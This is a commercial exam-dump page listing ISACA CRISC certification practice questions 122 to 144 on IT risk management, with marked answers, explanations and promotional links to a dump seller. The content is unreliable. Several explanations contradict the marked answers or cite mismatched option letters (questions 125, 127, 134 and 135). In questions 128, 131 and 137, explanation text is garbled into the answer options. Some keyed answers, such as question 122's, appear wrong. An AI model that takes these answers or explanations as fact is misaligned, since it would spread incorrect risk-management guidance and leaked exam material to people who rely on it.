[Apr-2023] CRISC Dumps With 100% Verified Q&As - Pass Guarantee or Full Refund [Q122-Q144]

[Apr-2023] CRISC Dumps With 100% Verified Q&As - Pass Guarantee or Full Refund

Pass ISACA CRISC Exam With Practice Test Questions Dumps Bundle

The CRISC certification exam consists of four domains: Risk Identification, Assessment, and Evaluation; Risk Response; Risk Monitoring; and Information Systems Control Design and Implementation. The exam consists of 150 multiple-choice questions and candidates have four hours to complete the exam. To be eligible to take the CRISC certification exam, candidates must have a minimum of three years of experience in the fields of IT risk management and information systems control.

 

NEW QUESTION # 122
Periodically reviewing and updating a risk register with details on identified risk factors PRIMARILY helps to:

• A. aggregate risk scenarios identified across different business units.
• B. build a threat profile of the organization for management review.
• C. minimize the number of risk scenarios for risk assessment.
• D. provide a current reference to stakeholders for risk-based decisions.

Answer: B

NEW QUESTION # 123
Which of the following is the MOST important consideration when developing an organization's risk taxonomy?

• A. Business context
• B. IT strategy
• C. Leading industry frameworks
• D. Regulatory requirements

Answer: A

Explanation:
Section: Volume D

NEW QUESTION # 124
You are working in Bluewell Inc. which make advertisement Websites. Someone had made unauthorized changes to a your Website. Which of the following terms refers to this type of loss?

• A. Loss of confidentiality
• B. Loss of availability
• C. Loss of revenue
• D. Loss of integrity

Answer: D

Explanation:
Explanation/Reference:
Explanation:
Loss of integrity refers to the following types of losses:
An e-mail message is modified in transit

A virus infects a file

Someone makes unauthorized changes to a Web site

Incorrect Answers:
A: Someone sees a password or a company's secret formula, this is referred to as loss of confidentiality.
C: An e-mail server is down and no one has e-mail access, or a file server is down so data files aren't available comes under loss of availability.
D: This refers to the events which would eventually cause loss of revenue.

NEW QUESTION # 125
FISMA requires federal agencies to protect IT systems and data. How often should compliance be audited by an external organization?

• A. Quarterly
• B. Annually
• C. Every three years
• D. Never

Answer: B

Explanation:
Section: Volume B
Explanation:
Inspection of FISMA is required to be done annually. Each year, agencies must have an independent evaluation of their program. The objective is to determine the effectiveness of the program. These evaluations include:
* Testing for effectiveness: Policies, procedures, and practices are to be tested. This evaluation does not test every policy, procedure, and practice. Instead, a representative sample is tested.
* An assessment or report: This report identifies the agency's compliance as well as lists compliance with FISMA. It also lists compliance with other standards and guidelines.
Incorrect Answers:
B, C, D: Auditing of compliance by external organization is done annually, not quarterly or every three years.

NEW QUESTION # 126
Which of the following come under the management class of controls?
Each correct answer represents a complete solution. (Choose two.)

• A. Audit and accountability control
• B. Program management control
• C. Identification and authentication control
• D. Risk assessment control

Answer: B,D

Explanation:
Explanation/Reference:
Explanation:
The Management class of controls includes five families. These families include over 40 individual controls.
Following is a list of each of the families in the Management class:
Certification, Accreditation, and Security Assessment (CA): This family of controls addresses steps to

implement a security and assessment program. It includes controls to ensure only authorized systems are allowed on a network. It includes details on important security concepts, such as continuous monitoring and a plan of action and milestones.
Planning (PL): The PL family focuses on security plans for systems. It also covers Rules of Behaviour

for users. Rules of Behaviour are also called an acceptable use policy.
Risk Assessment (RA): This family of controls provides details on risk assessments and vulnerability

scanning.
System and Services Acquisition (SA): The SA family includes any controls related to the purchase of

products and services. It also includes controls related to software usage and user installed software.
Program Management (PM): This family is driven by the Federal Information Security Management Act

(FISMA). It provides controls to ensure compliance with FISMA. These controls complement other controls. They don't replace them.
Incorrect Answers:
B, D: Identification and authentication, and audit and accountability control are technical class of controls.

NEW QUESTION # 127
You work as the project manager for Bluewell Inc. Your project has several risks that will affect several stakeholder requirements. Which project management plan will define who will be available to share information on the project risks?

• A. Communications Management Plan
• B. Stakeholder management strategy
• C. Resource Management Plan
• D. Risk Management Plan

Answer: A

Explanation:
Explanation/Reference:
Explanation:
The Communications Management Plan defines, in regard to risk management, who will be available to share information on risks and responses throughout the project.
The Communications Management Plan aims to define the communication necessities for the project and how the information will be circulated. The Communications Management Plan sets the communication structure for the project. This structure provides guidance for communication throughout the project's life and is updated as communication needs change. The Communication Managements Plan identifies and defines the roles of persons concerned with the project. It includes a matrix known as the communication matrix to map the communication requirements of the project.
Incorrect Answers:
A: The Resource Management Plan does not define risk communications.
B: The Risk Management Plan defines risk identification, analysis, response, and monitoring.
C: The stakeholder management strategy does not address risk communications.

NEW QUESTION # 128
What is the FIRST phase of IS monitoring and maintenance process?

• A. Prioritizing risks
• B. Implement monitoring
• C. Report result
• D. Explanation:
  Following are the phases that are involved in Information system monitoring and maintenance:
  Following are the phases that are involved in Information system monitoring and maintenance:
  Prioritize risk: The first phase involves the prioritization of risk which in turn involves following task:
  Analyze and prioritize risks to organizational objectives.
  Identify the necessary application components and flow of information through the system.
  Examine and understand the functionality of the application by reviewing the application system
  documentation and interviewing appropriate personnel.
  Identify controls: After prioritizing risk now the controls are identified, and this involves following
  tasks:
  Key controls are identified across the internal control system that addresses the prioritized risk.
  Applications control strength is identified.
  Impact of the control weaknesses is being evaluated.
  Testing strategy is developed by analyzing the accumulated information.
  Identify information: Now the IS control information should be identified:
  Identify information that will persuasively indicate the operating effectiveness of the internal control
  system.
  Observe and test user performing procedures .
  Implement monitoring: Develop and implement cost-effective procedures to evaluate the
  persuasive information.
  Report results: After implementing monitoring process the results are being reported to relevant
  stakeholders.
• E. Identifying controls

Answer: A

Explanation:
A, and C are incorrect. These all phases occur in IS monitoring and maintenance
process after prioritizing risks.

NEW QUESTION # 129
Prudent business practice requires that risk appetite not exceed:

• A. residual risk.
• B. inherent risk.
• C. risk capacity.
• D. risk tolerance.

Answer: C

NEW QUESTION # 130
Which of the following is the BEST way to determine the ongoing efficiency of control processes?

• A. Interview process owners
• B. Analyze key performance indicators (KPIs)
• C. Perform annual risk assessments
• D. Review the risk register

Answer: B

Explanation:
Section: Volume D
Explanation/Reference:

NEW QUESTION # 131
You and your project team are identifying the risks that may exist within your project. Some of the risks are small risks that won't affect your project much if they happen. What should you do with these identified risk events?

• A. is incorrect. While these risks may be accepted, they should be documented on the low
  priority risk watch list. This list will be periodically reviewed and the status of the risks may change.
• B. These risks can be dismissed.
• C. is incorrect. These risks are not dismissed; they are still documented on the low priority
  risk watch list.
• D. All risks must have a valid, documented risk response.
• E. These risks can be added to a low priority risk watch list.
• F. These risks can be accepted.
• G. Explanation:
  Low-impact, low-probability risks can be added to the low priority risk watch list.

Answer: E

Explanation:
is incorrect. Not every risk demands a risk response, so this choice is incorrect.

NEW QUESTION # 132
Which of the following would be MOST helpful to a risk practitioner when ensuring that mitigated risk remains within acceptable limits?

• A. Ensuring risk owners participate in a periodic control testing process
• B. Building an organizational risk profile after updating the risk register
• C. Implementing a process for ongoing monitoring of control effectiveness
• D. Designing a process for risk owners to periodically review identified risk

Answer: C

NEW QUESTION # 133
Which of the following is the MOST important factor affecting risk management in an organization?

• A. The risk manager's expertise
• B. Board of director's expertise
• C. The organization's culture
• D. Regulatory requirements

Answer: C

NEW QUESTION # 134
You are the project manager of a project in Bluewell Inc. You and your project team have identified several project risks, completed risk analysis, and are planning to apply most appropriate risk responses. Which of the following tools would you use to choose the appropriate risk response?

• A. Cause-and-effect analysis
• B. Decision tree analysis
• C. Project network diagrams
• D. Delphi Technique

Answer: B

Explanation:
Section: Volume C
Explanation
Explanation:
Decision tree analysis is a risk analysis tool that can help the project manager in determining the best risk response. The tool can be used to measure probability, impact, and risk exposure and how the selected risk response can affect the probability and/or impact of the selected risk event. It helps to form a balanced image of the risks and opportunities connected with each possible course of action. This makes them mostly useful for choosing between different strategies, projects, or investment opportunities particularly when the resources are limited. A decision tree is a decision support tool that uses a tree-like graph or model of decisions and their possible consequences, including chance event outcomes, resource costs, and utility.
Incorrect Answers:
A: Project network diagrams help the project manager and stakeholders visualize the flow of the project work, but they are not used as a part of risk response planning.
B: Cause-and-effect analysis is used for exposing risk factors and not an effective one in risk response planning. This analysis involves the use of predictive or diagnostic analytical tool for exploring the root causes or factors that contribute to positive or negative effects or outcomes.
D: Delphi technique is used for risk analysis, i.e., for identifying the most probable risks. Delphi is a group of experts who used to rate independently the business risk of an organization. Each expert analyzes the risk independently and then prioritizes the risk, and the result is combined into a consensus.

NEW QUESTION # 135
Natural disaster is BEST associated to which of the following types of risk?

• A. Short-term
• B. Discontinuous
• C. Large impact
• D. Long-term

Answer: B

Explanation:
Section: Volume D
Explanation:
Natural disaster can be a long-term or short-term and can have large or small impact on the company.
However, as the natural disasters are unpredictable and infrequent, they are best considered as discontinuous.
Incorrect Answers:
A: Natural disaster can be a short-term, but it is not the best answer.
B: Natural disaster can be a long-term, but it is not the best answer.
D: Natural disaster can be of large impact depending upon its nature, but it is not the best answer.

NEW QUESTION # 136
Which of the following is the priority of data owners when establishing risk mitigation method?

• A. Antivirus controls
• B. Platform security
• C. User entitlement changes
• D. Intrusion detection

Answer: C

Explanation:
Explanation/Reference:
Explanation:
Data owners are responsible for assigning user entitlement changes and approving access to the systems for which they are responsible.
Incorrect Answers:
B, C, D: Data owners are not responsible for intrusion detection, platform security or antivirus controls.
These are the responsibilities of data custodians.

NEW QUESTION # 137
You are the project manager of GHT project. You have implemented an automated tool to analyze and report on access control logs based on severity. This tool generates excessively large amounts of results. You perform a risk assessment and decide to configure the monitoring tool to report only when the alerts are marked "critical". What you should do in order to fulfill that?

• A. Apply risk response
• B. Perform quantitative risk analysis
• C. Optimize Key Risk Indicator
• D. Explanation:
  As the sensitivity of the monitoring tool has to be changed, therefore it requires optimization of Key Risk Indicator. The monitoring tool which is giving alerts is itself acting as a risk indicator. Hence to change the sensitivity of the monitoring tool to give alert only for critical situations requires optimization of the KRI.
• E. Update risk register

Answer: C

Explanation:
C, and D are incorrect. These options are not relevant to the change of sensitivity of the monitoring tools.

NEW QUESTION # 138
Which of the following is the BEST way to promote adherence to the risk tolerance level set by management?

• A. Increasing organizational resources to mitigate risks
• B. Avoiding risks that could materialize into substantial losses
• C. Defining expectations in the enterprise risk policy
• D. Communicating external audit results

Answer: C

Explanation:
Section: Volume D

NEW QUESTION # 139
Which of the following is the MAIN benefit of involving stakeholders in the selection of key risk indicators (KRIs)?

• A. Obtaining buy-in from risk owners
• B. Improving risk awareness
• C. Optimizing risk treatment decisions
• D. Leveraging existing metrics

Answer: A

NEW QUESTION # 140
What are the responsibilities of the CRO?
Each correct answer represents a complete solution. Choose three.

• A. Managing the supporting risk management function
• B. Advising Board of Directors
• C. Managing the risk assessment process
• D. Implement corrective actions

Answer: A,C,D

Explanation:
Explanation/Reference:
Explanation:
Chief Risk Officer is the executive-level manager in an organization. They provide corporate, guidance, governance, and oversight over the enterprise's risk management activities. The main priority for the CRO is to ensure that the organization is in full compliance with applicable regulations. They may also deal with areas regarding insurance, internal auditing, corporate investigations, fraud, and information security.
CRO's responsibilities include:
Managing the risk assessment process

Implementation of corrective actions

Communicate risk management issues

Supporting the risk management functions

NEW QUESTION # 141
Which of the following findings of a security awareness program assessment would cause the GREATEST concern to a risk practitioner?

• A. The program has not decreased threat counts.
• B. The program uses non-customized training modules.
• C. The program has not considered business impact.
• D. The program has been significantly revised

Answer: B

NEW QUESTION # 142
An organization has raised the risk appetite for technology risk. The MOST likely result would be:

• A. decreased residual risk
• B. lower risk management cost
• C. increased inherent risk
• D. higher risk management cost

Answer: A

NEW QUESTION # 143
Which of the following, who should be PRIMARILY responsible for performing user entitlement reviews?

• A. IT security manager
• B. Data custodian
• C. IT personnel
• D. Data owner

Answer: D

NEW QUESTION # 144
......

2023 Valid CRISC test answers & ISACA Exam PDF: https://www.testinsides.top/CRISC-dumps-review.html

Free ISACA CRISC Exam Questions and Answer from Training Expert TestInsides: https://drive.google.com/open?id=17_rwMMUPNtL-xTQIwzph-BcKYP_yQIfH